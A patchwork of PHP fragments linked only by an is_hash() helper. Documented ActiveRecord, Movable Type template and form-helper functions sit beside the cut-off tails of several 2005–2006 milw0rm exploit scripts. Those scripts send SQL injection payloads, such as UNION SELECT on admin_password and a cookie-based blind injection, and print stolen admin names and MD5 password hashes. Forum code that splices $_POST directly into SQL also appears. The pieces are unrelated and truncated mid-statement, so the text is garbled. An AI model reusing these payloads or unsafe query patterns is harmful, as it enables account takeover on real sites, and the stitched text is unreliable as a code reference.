/**
 * Render a value as a compact, human-readable literal for debug output.
 *
 * Hashes (as decided by the project's is_hash()) render as "[k => v, ]",
 * lists as "[v, ]", booleans as true/false, and anything else wrapped in
 * single quotes with no escaping. The output is for display only; it is
 * not meant to be parsed back.
 *
 * @param mixed $txt The value to render.
 * @return string The rendered representation.
 */
function output($txt)
{
    // Dispatch order matters: hash check comes before the generic array check.
    if (is_hash($txt)) {
        $rendered = '[';
        foreach ($txt as $key => $item) {
            $rendered .= output($key) . ' => ' . output($item) . ', ';
        }
        return $rendered . ']';
    }
    if (is_array($txt)) {
        $rendered = '[';
        foreach ($txt as $item) {
            $rendered .= output($item) . ', ';
        }
        return $rendered . ']';
    }
    if ($txt === true) {
        return 'true';
    }
    if ($txt === false) {
        return 'false';
    }
    // Scalars (and null) are quoted verbatim; embedded quotes are not escaped.
    return "'{$txt}'";
}
/**
 * Build a comma-separated SQL field list, turning hash entries into
 * "field AS alias" pairs.
 *
 * Non-array input is returned untouched. Keys and values are spliced into
 * the SQL verbatim (no identifier quoting), so callers must pass trusted
 * column and alias names only, never request input.
 *
 * @param string|array $fields A field string, a list of field strings, or an
 *                             alias => field hash.
 * @return string|mixed The field list as one SQL fragment (or the input when
 *                      it was not an array).
 */
public function alias($fields)
{
    if (!is_array($fields)) {
        return $fields;
    }
    if (is_hash($fields)) {
        foreach ($fields as $aliasName => $fieldName) {
            // Numeric keys are positional entries, not aliases.
            if (is_numeric($aliasName)) {
                continue;
            }
            $fields[$aliasName] = $fieldName . ' AS ' . $aliasName;
        }
    }
    return implode(',', $fields);
}
/**
 * Pulls out the options hash from $array if any.
 *
 * When the last element validates as an options hash it is removed from
 * $array (in place) and returned. If validation throws but the element is
 * still a hash, it is treated as a conditions hash instead.
 *
 * @internal DO NOT remove the reference on $array.
 * @param array &$array An array
 * @return array A valid options array
 * @throws ActiveRecordException When the last element fails validation and is not a hash.
 */
public static function extract_and_validate_options(array &$array)
{
    if (!$array) {
        return array();
    }
    // Bound by reference so the element stays readable after array_pop().
    $candidate =& $array[count($array) - 1];
    try {
        if (!self::is_options_hash($candidate)) {
            return array();
        }
        array_pop($array);
        return $candidate;
    } catch (ActiveRecordException $e) {
        if (is_hash($candidate)) {
            return array('conditions' => $candidate);
        }
        throw $e;
    }
}
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $data; sendpacketii($packet); sleep(1); $packet = "GET " . $p . "index.php?mode=viewid&post_id={$post_id} HTTP/1.0\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; sendpacketii($packet); //echo $html; $temp = explode('"message"><!--', $html); for ($i = 1; $i < count($temp); $i++) { $temp2 = explode("-->", $temp[$i]); if (is_hash($temp2[0])) { $hash = $temp2[0]; $temp2 = explode("-->", $temp[$i + 1]); $admin = $temp2[0]; echo "----------------------------------------------------------------\n"; echo "admin -> " . $admin . "\n"; echo "password (md5) -> " . $hash . "\n"; echo "----------------------------------------------------------------\n"; die; } } //if you are here... echo "exploit failed..."; ?> # milw0rm.com [2006-08-07]
$packet = "POST " . $p . "index.php HTTP/1.0\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Accept-Encoding: text/plain\r\n"; $packet .= "User-Agent: Googlebot/2.1\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $data; sendpacketii($packet); if (eregi("Gadget is not enabled", $html)) { die("search gadget is not enabled... exploit failed"); } $temp = explode('">*SUNTZOI*', $html); $temp2 = explode('*SUNTZOI*', $temp[1]); $admin = $temp2[0]; $temp = explode('href="*SUNTZU*', $html); $temp2 = explode('*SUNTZU*', $temp[1]); $hash = $temp2[0]; if ($admin != '' and $hash != '' and is_hash($hash)) { echo "Exploit succeeded...\r\n"; echo "--------------------------------------------------------------------\r\n"; echo "admin -> " . $admin . "\r\n"; echo "password (md5) -> " . $hash . "\r\n"; echo "--------------------------------------------------------------------\r\n"; } else { echo "Exploit failed, maybe wrong table prefix..."; } ?> # milw0rm.com [2006-06-23]
/**
 * MTSetVar: assign, append/prepend, arithmetically update, or push/unshift/
 * delete/undef a template variable in $ctx->__stash['vars'].
 *
 * Handles names of the form "func(name)", "name[index]" and "name{key}",
 * where index/key may themselves be "$var" references; a leading "$" on the
 * name makes it an indirect reference. Inside an MTSetHashVar block the
 * assignment goes into the '__inside_set_hashvar' stash instead.
 *
 * @param array $args Tag attributes (name|var, value, function, index, key,
 *                    append, prepend, op).
 * @param object &$ctx Template context; errors are reported via $ctx->error().
 * @return string Always '' on success, or whatever $ctx->error() returns.
 */
function smarty_function_mtsetvar($args, &$ctx) {
    // status: complete
    // parameters: name, value
    $name = $args['name'];
    $name or $name = $args['var'];
    if (!$name) { return ''; }
    $value = $args['value'];
    $vars =& $ctx->__stash['vars'];
    if (strtolower($name) == 'page_layout') {
        # replaces page layout for current page
        // Side effect only: the generic assignment below still runs for 'page_layout'.
        require_once "MTUtil.php";
        $columns = get_page_column($value);
        $vars['page_columns'] = $columns;
        $vars['page_layout'] = $value;
    }
    // "func(name)" syntax takes precedence over an explicit function= attribute.
    if (preg_match('/^(\\w+)\\((.+)\\)$/', $name, $matches)) {
        $func = $matches[1];
        $name = $matches[2];
    } else {
        if (array_key_exists('function', $args)) {
            $func = $args['function'];
        }
    }
    # pick off any {...} or [...] from the name.
    if (preg_match('/^(.+)([\\[\\{])(.+)[\\]\\}]$/', $name, $matches)) {
        $name = $matches[1];
        $br = $matches[2];
        $ref = $matches[3];
        // A "$var" subscript is resolved against the template vars; chr(0) marks an unset one.
        if (preg_match('/^\\$(.+)/', $ref, $ref_matches)) {
            $ref = $vars[$ref_matches[1]];
            if (!isset($ref)) { $ref = chr(0); }
        }
        // Ternary used for its side effect: '[' selects an array index, '{' a hash key.
        $br == '[' ? $index = $ref : ($key = $ref);
    } else {
        if (array_key_exists('index', $args)) {
            $index = $args['index'];
        } else {
            if (array_key_exists('key', $args)) {
                $key = $args['key'];
            }
        }
    }
    // Indirect name: "$foo" means "the variable whose name is stored in foo".
    if (preg_match('/^\\$/', $name)) {
        $name = $vars[$name];
        if (!isset($name)) {
            // NOTE(review): $tag is never assigned in this function, so the message interpolates an empty tag name.
            return $ctx->error($ctx->mt->translate("You used a [_1] tag without a valid name attribute.", "<MT{$tag}>"));
        }
    }
    // $existing is only consulted by the append/prepend/op branches below.
    $existing = $vars[$name];
    require_once "MTUtil.php";
    if (isset($key)) {
        if (!isset($existing)) {
            $existing = array($key => $value);
        } elseif (is_hash($existing)) {
            $existing = $existing[$key];
        } else {
            return $ctx->error($ctx->mt->translate("'[_1]' is not a hash.", $name));
        }
    } elseif (isset($index)) {
        if (!isset($existing)) {
            $existing[$index] = $value;
        } elseif (is_array($existing)) {
            if (is_numeric($index)) {
                $existing = $existing[$index];
            } else {
                return $ctx->error($ctx->mt->translate("Invalid index."));
            }
        } else {
            return $ctx->error($ctx->mt->translate("'[_1]' is not an array.", $name));
        }
    }
    if (array_key_exists('append', $args) && $args['append']) {
        $value = isset($existing) ? $existing . $value : $value;
    } elseif (array_key_exists('prepend', $args) && $args['prepend']) {
        $value = isset($existing) ? $value . $existing : $value;
    } elseif (isset($existing) && array_key_exists('op', $args)) {
        $op = $args['op'];
        $value = _math_operation($op, $existing, $value);
        if (!isset($value)) {
            // NOTE(review): $value was just found unset, so the message reports the (null) result, not the original operand.
            return $ctx->error($ctx->mt->translate("[_1] [_2] [_3] is illegal.", $existing, $op, $value));
        }
    }
    // Re-read the stored value; $existing may have been narrowed to a sub-element above.
    $data = $vars[$name];
    if (isset($key)) {
        if (isset($func) && 'delete' == strtolower($func)) {
            unset($data[$key]);
        } else {
            $data[$key] = $value;
        }
    } elseif (isset($index)) {
        $data[$index] = $value;
    } elseif (isset($func)) {
        if ('undef' == strtolower($func)) {
            unset($data);
        } else {
            if (isset($data) && !is_array($data)) {
                return $ctx->error($ctx->mt->translate("'[_1]' is not an array.", $name));
            }
            if (!isset($data)) { $data = array(); }
            if ('push' == strtolower($func)) {
                array_push($data, $value);
            } elseif ('unshift' == strtolower($func)) {
                array_unshift($data, $value);
            } else {
                return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function.", $func));
            }
        }
    } else {
        $data = $value;
    }
    // Inside an MTSetHashVar block the assignment is collected into that hash instead of the vars.
    $hash = $ctx->stash('__inside_set_hashvar');
    if (isset($hash)) {
        $hash[$name] = $data;
        $ctx->stash('__inside_set_hashvar', $hash);
    } else {
        if (is_array($vars)) {
            $vars[$name] = $data;
        } else {
            // First variable ever set: create the vars array and bind the stash to it.
            $vars = array($name => $data);
            $ctx->__stash['vars'] =& $vars;
        }
    }
    return '';
}
/**
 * MTIf block handler: evaluate a condition on a template variable (name|var)
 * or on the output of another tag (tag), then delegate to $ctx->_hdlr_if().
 *
 * Comparison attributes, first match wins: eq, ne, gt, lt, ge, le, like
 * (regex), test (raw PHP expression); with none of them the value's
 * truthiness decides. op/value apply an arithmetic operation first.
 *
 * @param array $args Tag attributes.
 * @param string|null $content Block body; null on the opening call.
 * @param object &$ctx Template context.
 * @param bool &$repeat Smarty block repeat flag.
 * @return string Rendered block content, or $ctx->error()'s return value.
 */
function smarty_block_mtif($args, $content, &$ctx, &$repeat) {
    if (!isset($content)) {
        $result = 0;
        $name = isset($args['name']) ? $args['name'] : $args['var'];
        if (isset($name)) {
            unset($ctx->__stash['__cond_tag__']);
            # pick off any {...} or [...] from the name.
            if (preg_match('/^(.+)([\\[\\{])(.+)[\\]\\}]$/', $name, $matches)) {
                $name = $matches[1];
                $br = $matches[2];
                $ref = $matches[3];
                // NOTE(review): this pattern matches a literal backslash before the "$"
                // (the sibling mtsetvar handler uses '/^\$(.+)/'); possibly over-escaped -- confirm.
                // NOTE(review): $vars is only bound in the closing-call branch below, so it is
                // undefined here and the subscript reference resolves to null.
                if (preg_match('/^\\\\\\$(.+)/', $ref, $ref_matches)) {
                    $ref = $vars[$ref_matches[1]];
                    if (!isset($ref)) { $ref = chr(0); }
                }
                // Ternary used for its side effect: '[' selects an array index, '{' a hash key.
                $br == '[' ? $index = $ref : ($key = $ref);
            } else {
                if (array_key_exists('index', $args)) {
                    $index = $args['index'];
                } else {
                    if (array_key_exists('key', $args)) {
                        $key = $args['key'];
                    }
                }
            }
            // NOTE(review): in a single-quoted string the "$" is literal, so this regex is
            // '/^$/' and matches only an empty name; the mtvar handler uses '/^\$/' for the
            // indirect-name case. Likely a typo -- confirm intended behaviour.
            if (preg_match('/^$/', $name)) {
                $name = $vars[$name];
                if (!isset($name)) {
                    // NOTE(review): $tag is unassigned in this branch (set only in the tag= branch).
                    return $ctx->error($ctx->mt->translate("You used an [_1] tag without a valid name attribute.", "<MT{$tag}>"));
                }
            }
            if (isset($name)) {
                $value = $ctx->__stash['vars'][$name];
                require_once "MTUtil.php";
                if (is_hash($value)) {
                    if (isset($key)) {
                        // chr(0) is the marker for an unresolved "$var" key.
                        if ($key != chr(0)) {
                            $val = $value[$key];
                        } else {
                            unset($value);
                        }
                    } else {
                        $val = $value;
                    }
                } elseif (is_array($value)) {
                    if (isset($index)) {
                        if (is_numeric($index)) {
                            $val = $value[$index];
                        } else {
                            unset($value); # fall through to any 'default'
                        }
                    } else {
                        $val = $value;
                    }
                } else {
                    $val = $value;
                }
            }
        } elseif (isset($args['tag'])) {
            // Condition on another tag's output; a failing tag counts as ''.
            $tag = $args['tag'];
            $tag = preg_replace('/^mt:?/i', '', $tag);
            $largs = $args; // local arguments without 'tag' element
            unset($largs['tag']);
            try {
                $val = $ctx->tag($tag, $largs);
            } catch (exception $e) {
                $val = '';
            }
        }
        // Lazily-compiled template functions are stored by name; expand them here.
        // NOTE(review): the test inspects $value but the call uses $val -- the two may differ.
        if (!is_array($value) && preg_match('/^smarty_fun_[a-f0-9]+$/', $value)) {
            if (function_exists($val)) {
                ob_start();
                $val($ctx, array());
                $val = ob_get_contents();
                ob_end_clean();
            } else {
                $val = '';
            }
        }
        // Record what was tested so MTElse/MTElseIf can refer to it.
        if (isset($args['tag'])) {
            $ctx->__stash['__cond_tag__'] = $args['tag'];
        } else {
            if (isset($args['name'])) {
                $var_key = $args['name'];
            } else {
                if (isset($args['var'])) {
                    $var_key = $args['var'];
                }
            }
            $ctx->__stash['__cond_name__'] = $var_key;
        }
        $ctx->__stash['__cond_value__'] = $val;
        if (array_key_exists('op', $args)) {
            $op = $args['op'];
            $rvalue = $args['value'];
            if ($op && isset($value) && !is_array($value)) {
                $val = _math_operation($op, $val, $rvalue);
                if (!isset($val)) {
                    return $ctx->error($ctx->mt->translate("[_1] [_2] [_3] is illegal.", array($value, $op, $rvalue)));
                }
            }
        }
        // All comparisons are loose (==, <, >), so numeric strings compare numerically.
        if (array_key_exists('eq', $args)) {
            $val2 = $args['eq'];
            $result = $val == $val2 ? 1 : 0;
        } elseif (array_key_exists('ne', $args)) {
            $val2 = $args['ne'];
            $result = $val != $val2 ? 1 : 0;
        } elseif (array_key_exists('gt', $args)) {
            $val2 = $args['gt'];
            $result = $val > $val2 ? 1 : 0;
        } elseif (array_key_exists('lt', $args)) {
            $val2 = $args['lt'];
            $result = $val < $val2 ? 1 : 0;
        } elseif (array_key_exists('ge', $args)) {
            $val2 = $args['ge'];
            $result = $val >= $val2 ? 1 : 0;
        } elseif (array_key_exists('le', $args)) {
            $val2 = $args['le'];
            $result = $val <= $val2 ? 1 : 0;
        } elseif (array_key_exists('like', $args)) {
            // like="/pattern/si" keeps the given modifiers; a bare pattern has its slashes escaped.
            // The pattern is template-supplied and interpolated as-is; a malformed one makes
            // preg_match() return false, which counts as no match.
            $patt = $args['like'];
            $opt = "";
            if (preg_match("/^\\/.+\\/([si]+)?\$/", $patt, $matches)) {
                $patt = preg_replace("/^\\/|\\/([si]+)?\$/", "", $patt);
                if ($matches[1]) { $opt = $matches[1]; }
            } else {
                $patt = preg_replace("!/!", "\\/", $patt);
            }
            $result = preg_match("/{$patt}/{$opt}", $val) ? 1 : 0;
        } elseif (array_key_exists('test', $args)) {
            // eval() runs the template's test= attribute as PHP, so template authors have
            // the same power as server-side code. extract() is called without EXTR_SKIP, so a
            // template var named e.g. 'ctx', 'args' or 'result' overwrites this scope's local.
            $expr = 'return (' . $args['test'] . ') ? 1 : 0;';
            // export vars into local variable namespace, then eval expr
            extract($ctx->__stash['vars']);
            $result = eval($expr);
            if ($result === FALSE) {
                // die() aborts the whole request, not just this tag.
                die("error in expression [" . $args['test'] . "]");
            }
        } else {
            $result = isset($val) && $val ? 1 : 0;
        }
        return $ctx->_hdlr_if($args, $content, $ctx, $repeat, $result);
    } else {
        $vars =& $ctx->__stash['vars'];
        return $ctx->_hdlr_if($args, $content, $ctx, $repeat);
    }
}
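/**
 * Translate find()-style where arguments into $this->where / $this->where_values.
 *
 * Accepted shapes:
 *  - a single hash: rendered through Expressions (fields are prefixed with the
 *    table name when joins are present);
 *  - a SQL fragment followed by bind values: the fragment is used verbatim, so
 *    it must come from trusted code and never from request input; the values
 *    travel as bind parameters. A nested array among the values is expanded
 *    through Expressions so its bind marker matches the element count.
 *
 * Fix: the original scanned the values with a by-reference foreach and never
 * unset the loop variable, leaving the last element aliased inside the array
 * that became $this->where_values. The scan is now by value.
 *
 * @param array $args Where arguments as passed by the caller.
 * @return void
 */
private function apply_where_conditions($args)
{
    require_once 'Expressions.php';

    $num_args = count($args);
    if ($num_args == 1 && is_hash($args[0])) {
        $hash = is_null($this->joins) ? $args[0] : $this->prepend_table_name_to_fields($args[0]);
        $e = new Expressions($this->connection, $hash);
        $this->where = $e->to_s();
        $this->where_values = array_flatten($e->values());
        return;
    }

    if ($num_args <= 0) {
        return;
    }

    $values = array_slice($args, 1);

    // By-value scan: we only need to know whether any bind value is an array.
    $has_nested = false;
    foreach ($values as $value) {
        if (is_array($value)) {
            $has_nested = true;
            break;
        }
    }

    if ($has_nested) {
        // Expressions expands the marker for the nested array into one marker per element.
        $e = new Expressions($this->connection, $args[0]);
        $e->bind_values($values);
        $this->where = $e->to_s();
        $this->where_values = array_flatten($e->values());
        return;
    }

    // No nested array, so the fragment and its values are used directly.
    $this->where = $args[0];
    $this->where_values = $values;
}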
$packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Cookie: threadvisit={$sql};\r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $data; sendpacketii($packet); $temp = explode("#post", $html); $temp2 = explode("\n", $temp[1]); echo chr((int) $temp2[0]); $user .= chr((int) $temp2[0]); } echo "\n"; function is_hash($hash) { if (ereg("^[a-f0-9]{32}", trim($hash))) { return true; } else { return false; } } if (is_hash($hash)) { print_r(' exploit succeeded, try this cookie: wbb_userid=' . $uid . '; wbb_userpassword='******'; '); } else { echo "exploit failed...\n"; } ?> # milw0rm.com [2006-11-24]
$temp2 = explode('"', $temp[1]); $HASH = $temp2[0]; if (is_hash($HASH)) { echo "HASH ->" . htmlentities($HASH) . "<BR>"; die("Exploit Succeeded..."); } else { echo "Step 1 failed... trying step 2...<br>"; } #STEP 2 -> if STEP 1 failed, vulnerability in getfile.php... this works with magic_quotes off $SQL = "'UNION SELECT value,value FROM " . $prefix . "variables1 WHERE name='admin_password'/*"; $SQL = urlencode($SQL); $packet = "GET " . $p . "getfile.php?cat=" . $SQL . " HTTP/1.1\r\n"; $packet .= "User-Agent: Python-urllib/2.0a1, maybe ;)\r\n"; $packet .= "Accept: text/plain\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; show($packet); sendpacketii($packet); $temp = explode('Content-Type: ', $html); $temp2 = explode(chr(0xd), $temp[1]); $HASH = $temp2[0]; if (is_hash($HASH)) { echo "HASH ->" . htmlentities($HASH) . "<BR>Exploit Succeeded..."; } else { echo "Exploit failed..."; } } ?> # milw0rm.com [2005-12-24]
echo "admin -> " . $my_admin . "[???]\n"; sleep(1); break; } if ($i == 255) { die("Exploit failed..."); } } $j++; } echo "--------------------------------------------------------------------\n"; echo "admin -> " . $my_admin . "\n"; echo "password (md5) -> " . $my_password . "\n"; echo "--------------------------------------------------------------------\n"; function is_hash($hash) { if (ereg("^[a-f0-9]{32}", trim($hash))) { return true; } else { return false; } } if (is_hash($my_password)) { echo "Exploit succeeded..."; } else { echo "Exploit failed..."; } ?> # milw0rm.com [2006-09-21]
$searchresult[] = $row['topic_id']; } if (count($searchresult) > 0) { $data = array('ids' => $searchresult, 'ignored' => $ignored, 'used' => $used, 'search' => $gpc->get('search', str), 'name' => $gpc->get('name', str), 'boards' => $gpc->get('boards', arr_int), 'opt_0' => $gpc->get('opt_0', int), 'opt_1' => $gpc->get('opt_1', int), 'opt_2' => $gpc->get('opt_2', int), 'temp' => $gpc->get('temp', int), 'temp2' => $gpc->get('temp2', int), 'sort' => $gpc->get('sort', str), 'order' => $gpc->get('order', str)); $fid = md5(microtime()); file_put_contents('cache/search/' . $fid . '.inc.php', serialize($data)); $slog->updatelogged(); $db->close(); viscacha_header('Location: search.php?action=result&fid=' . $fid . SID2URL_JS_x); exit; } else { error($lang->phrase('search_nothingfound'), 'search.php' . SID2URL_1); } } elseif ($_GET['action'] == "result") { $fid = $gpc->get('fid'); if (!is_hash($fid)) { error($lang->phrase('query_string_error'), 'search.php' . SID2URL_1); } $file = "cache/search/{$fid}.inc.php"; if (!file_exists($file)) { error($lang->phrase('search_doesntexist'), 'search.php' . SID2URL_1); } $data = file_get_contents($file); $data = unserialize($data); $ignored = array(); foreach ($data['ignored'] as $row) { $row = trim($row); if (!empty($row)) { $ignored[] = $row; } }
/**
 * Serialise $val according to a spec, recursing into hashes and lists.
 *
 * Called as writeValueWithSpec($val) or writeValueWithSpec($val, $spec);
 * without a second argument $this->spec is used. A hash spec writes the
 * members in sorted key order (from an object or an array); a list spec
 * writes the element count followed by each element against $spec[0];
 * any other spec is passed straight to writeValue().
 *
 * NOTE(review): (TRUEVAL & FALSEVAL) is a bitwise AND of two project
 * constants; presumably a sentinel meaning "infer the type" -- confirm.
 *
 * @return void
 */
function writeValueWithSpec()
{
    $callArgs = func_get_args();
    $val = $callArgs[0];
    $spec = count($callArgs) >= 2 ? $callArgs[1] : $this->spec;

    if (!is_array($spec)) {
        $type = $spec === (TRUEVAL & FALSEVAL) ? type_check($val) : $spec;
        $this->writeValue($val, $type, TRUE);
        return;
    }

    if (!is_hash($spec)) {
        // List: length prefix, then every element against the single element spec.
        $length = count($val);
        $this->writeValue($length, type_check($length));
        foreach ($val as $element) {
            $this->writeValueWithSpec($element, $spec[0]);
        }
        return;
    }

    // Hash: deterministic member order regardless of how the spec was built.
    $fieldNames = array_keys($spec);
    sort($fieldNames);
    $fromObject = is_object($val);
    foreach ($fieldNames as $field) {
        $member = $fromObject ? $val->{$field} : $val[$field];
        $this->writeValueWithSpec($member, $spec[$field]);
    }
}
echo "table prefix -> " . $prefix . "\n"; } else { die("Unable to disclose table prefix...\n"); } } $diff = array(",0,0,0,0,0", ",0,0,0,0", ",0,0,0", ",0,0", ",0", ""); for ($j = 0; $j <= count($diff) - 1; $j++) { $sql = "9999')/**/UNION/**/SELECT/**/1,0,0,0,CONCAT('*WhOp*',username,':',password,'*WhOp*'),0,0,0,0,0" . $diff[$j] . "/**/FROM " . $prefix . "_papoo_user/**/WHERE/**/gruppenid='g1,'/*"; $sql = urlencode($sql); $packet = "GET " . $p . "forumthread.php?msgid=" . $sql . " HTTP/1.0\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; sendpacketii($packet); $temp = explode("*WhOp*", $html); for ($i = 1; $i <= count($temp) - 1; $i++) { $temp2 = explode(":", $temp[$i]); if (is_hash($temp2[1])) { echo "--------------------------------------------------------\n"; echo "admin -> " . $temp2[0] . " \n"; echo "password (md5) -> " . $temp2[1] . " \n"; echo "--------------------------------------------------------\n"; die; } } } //if you are here... echo "exploit failed..."; ?> # milw0rm.com [2006-07-07]
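/**
 * Render a list of <option> elements.
 *
 * For a hash, keys become option values and values become labels; for a
 * plain list each element is used as both. The entry whose value equals
 * $default_value (loose comparison, as before) is marked SELECTED.
 *
 * Fixes: each() was removed in PHP 8 and is replaced by foreach; the value
 * attribute is now HTML-escaped like the label was (previously a key with a
 * quote or angle bracket could break out of the attribute).
 *
 * @param array  $options       Option value => label hash, or a list of labels.
 * @param string $key           Unused; kept for signature compatibility.
 * @param string $value         Unused; kept for signature compatibility.
 * @param string $default_value The option value to preselect.
 * @return string Newline-separated <option> markup.
 */
function select_options($options = array(), $key = "", $value = "", $default_value = "")
{
    $elem = array();
    $keyed = is_hash($options);
    foreach ($options as $optKey => $label) {
        $optValue = $keyed ? $optKey : $label;
        $selected = ($default_value == $optValue) ? ' SELECTED' : '';
        $elem[] = '<option value="' . htmlspecialchars($optValue, ENT_QUOTES, 'UTF-8') . '"' . $selected . '>'
            . htmlspecialchars($label, ENT_QUOTES, 'UTF-8') . '</option>';
    }
    return implode("\n", $elem);
}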
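/**
 * Persist form/error data under a temporary id so it can be re-read later
 * (presumably after a redirect; see import_error_data() elsewhere).
 *
 * Fix: the unused `global $gpc;` declaration is dropped.
 *
 * @param mixed  $fc  The data to store (handed to CacheItem::set()).
 * @param string $fid Existing id to reuse; when it is not a valid hash a new
 *                    one is generated.
 * @return string The id the data was stored under.
 */
function save_error_data($fc, $fid = '')
{
    if (!is_hash($fid)) {
        // md5(microtime()) yields the 32-hex format is_hash() accepts, but it is
        // time-derived and therefore guessable: treat it as a cache key, not a secret.
        $fid = md5(microtime());
    }
    // $fid is presumably used as the file name under temp/errordata/ -- hence the is_hash() gate above.
    $cache = new CacheItem($fid, 'temp/errordata/');
    $cache->set($fc);
    $cache->export();
    return $fid;
}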
/**
 * MTLoop block handler: iterate over an array/hash template variable,
 * exposing __counter__, __odd__, __even__, __first__, __last__, __key__ and
 * __value__ (plus each hash member, lower-cased) on every pass.
 *
 * Supports sort_by="key|value [numeric] [reverse]" and glue="..." between
 * non-empty iterations. Loop state lives in the '__loop_keys',
 * '__loop_values' and '__out' stash slots; '__loop_keys' is set to 0 as the
 * end-of-loop sentinel.
 *
 * @param array $args Tag attributes (name|var, sort_by, glue).
 * @param string|null $content Block body; null on the opening call.
 * @param object &$ctx Template context.
 * @param bool &$repeat Smarty block repeat flag.
 * @return string Content for this iteration ('' when there is nothing to loop).
 */
function smarty_block_mtloop($args, $content, &$ctx, &$repeat) {
    $localvars = array(array('__loop_keys', '__loop_values', '__out'), common_loop_vars());
    if (!isset($content)) {
        $ctx->localize($localvars);
        $vars =& $ctx->__stash['vars'];
        $value = '';
        $name = $args['name'];
        $name or $name = $args['var'];
        if (!$name) { return ''; }
        if (isset($vars[$name])) { $value = $vars[$name]; }
        // Lazily-compiled template functions are stored by name; expand them here.
        if (!is_array($value) && preg_match('/^smarty_fun_[a-f0-9]+$/', $value)) {
            if (function_exists($value)) {
                ob_start();
                $value($ctx, array());
                $value = ob_get_contents();
                ob_end_clean();
            } else {
                $value = '';
            }
        }
        if (!is_array($value) || 0 == count($value)) {
            $repeat = false;
            return '';
        }
        $sort = $args['sort_by'];
        $keys = array_keys($value);
        if ($sort) {
            $sort = strtolower($sort);
            if (preg_match('/\\bkey\\b/', $sort)) {
                // create_function() was removed in PHP 8.
                usort($keys, create_function('$a,$b', 'return strcmp($a, $b);'));
            } elseif (preg_match('/\\bvalue\\b/', $sort)) {
                // The comparator is built as PHP source: every key and value is interpolated
                // verbatim into code that create_function() compiles. A value containing a
                // quote or semicolon changes the generated code (code injection), and
                // non-scalar values are stringified; loop data must be trusted here.
                $sort_fn = '';
                foreach (array_keys($value) as $key) {
                    $v = $value[$key];
                    $sort_fn .= "\$value['{$key}']='{$v}';";
                }
                if (preg_match('/\\bnumeric\\b/', $sort)) {
                    $sort_fn .= 'return $value[$a] === $value[$b] ? 0 : ($value[$a] > $value[$b] ? 1 : -1);';
                    $sorter = create_function('$a,$b', $sort_fn);
                } else {
                    $sort_fn .= 'return strcmp($value[$a], $value[$b]);';
                    $sorter = create_function('$a,$b', $sort_fn);
                }
                usort($keys, $sorter);
            }
            if (preg_match('/\\breverse\\b/', $sort)) {
                $keys = array_reverse($keys);
            }
        }
        $counter = 1;
        $ctx->stash('__loop_values', $value);
        $ctx->stash('__out', false);
        // NOTE(review): $out is not assigned on this first pass, so the glue check below reads an undefined local.
    } else {
        $counter = $ctx->__stash['vars']['__counter__'] + 1;
        $keys = $ctx->stash('__loop_keys');
        $value = $ctx->stash('__loop_values');
        $out = $ctx->stash('__out');
        // 0 is the end-of-loop sentinel stored once the last key was consumed.
        if (!isset($keys) || $keys == 0) {
            $ctx->restore($localvars);
            $repeat = false;
            if (isset($args['glue']) && $out && !empty($content)) {
                $content = $args['glue'] . $content;
            }
            return $content;
        }
    }
    $key = array_shift($keys);
    $this_value = $value[$key];
    $ctx->stash('__loop_keys', $keys);
    $ctx->__stash['vars']['__counter__'] = $counter;
    $ctx->__stash['vars']['__odd__'] = $counter % 2 == 1;
    $ctx->__stash['vars']['__even__'] = $counter % 2 == 0;
    $ctx->__stash['vars']['__first__'] = $counter == 1;
    $ctx->__stash['vars']['__last__'] = count($keys) == 0;
    $ctx->__stash['vars']['__key__'] = $key;
    $ctx->__stash['vars']['__value__'] = $this_value;
    // A hash element also exposes its members as lower-cased template vars.
    if (is_array($this_value) && 0 < count($this_value)) {
        require_once "MTUtil.php";
        if (is_hash($this_value)) {
            foreach (array_keys($this_value) as $inner_key) {
                $ctx->__stash['vars'][strtolower($inner_key)] = $this_value[$inner_key];
            }
        }
    }
    // glue is prepended only once some earlier iteration has produced output.
    if (isset($args['glue']) && !empty($content)) {
        if ($out) {
            $content = $args['glue'] . $content;
        } else {
            $ctx->stash('__out', true);
        }
    }
    if (0 === count($keys)) {
        $ctx->stash('__loop_keys', 0);
    }
    $repeat = true;
    return $content;
}
} else { ($code = $plugins->load('editprofile_about2_query')) ? eval($code) : null; $db->query("UPDATE {$db->pre}user SET about = '{$_POST['about']}' WHERE id = '{$my->id}'"); ok($lang->phrase('data_success'), "editprofile.php?action=about" . SID2URL_x); } } elseif ($_GET['action'] == "about") { if ($my->p['useabout'] == 0) { errorLogin($lang->phrase('not_allowed'), "editprofile.php"); } $breadcrumb->Add($lang->phrase('editprofile_about')); echo $tpl->parse("header"); echo $tpl->parse("menu"); ($code = $plugins->load('editprofile_abos_Start')) ? eval($code) : null; BBProfile($bbcode); $fid = $gpc->get('fid', str); if (is_hash($fid)) { $data = $gpc->unescape(import_error_data($fid)); if ($_GET['job'] == 'preview') { $preview = true; $data = $gpc->unescape($data); $parsedPreview = $bbcode->parse($data); } else { $preview = false; } } else { $data = $my->about; $preview = false; } $chars = numbers($config['maxaboutlength']); ($code = $plugins->load('editprofile_abos_prepared')) ? eval($code) : null; echo $tpl->parse("editprofile/about");
/**
 * Update a record in a table
 *
 * $dataobject is an object containing needed data
 * Relies on $dataobject having a variable "id" to
 * specify the record to update
 *
 * Column names go through db_quote_identifier() and every value is passed
 * as a bind parameter, so the SQL text itself never contains data. Keys of
 * a hash/object $where become column names, so they must be trusted
 * identifiers, not request input.
 *
 * @uses $db
 * @param string $table The database table to be checked against.
 * @param array $dataobject An object with contents equal to fieldname=>fieldvalue. Must have an entry for 'id' to map to the table specified.
 * @param mixed $where defines the WHERE part of the upgrade. Can be string (key) or array (keys) or hash (keys/values).
 * If the first two, values are expected to be in $dataobject.
 * @return bool
 * @throws SQLException
 */
function update_record($table, $dataobject, $where = null) {
    global $db;
    // Work on a copy: where-fields are unset from it below.
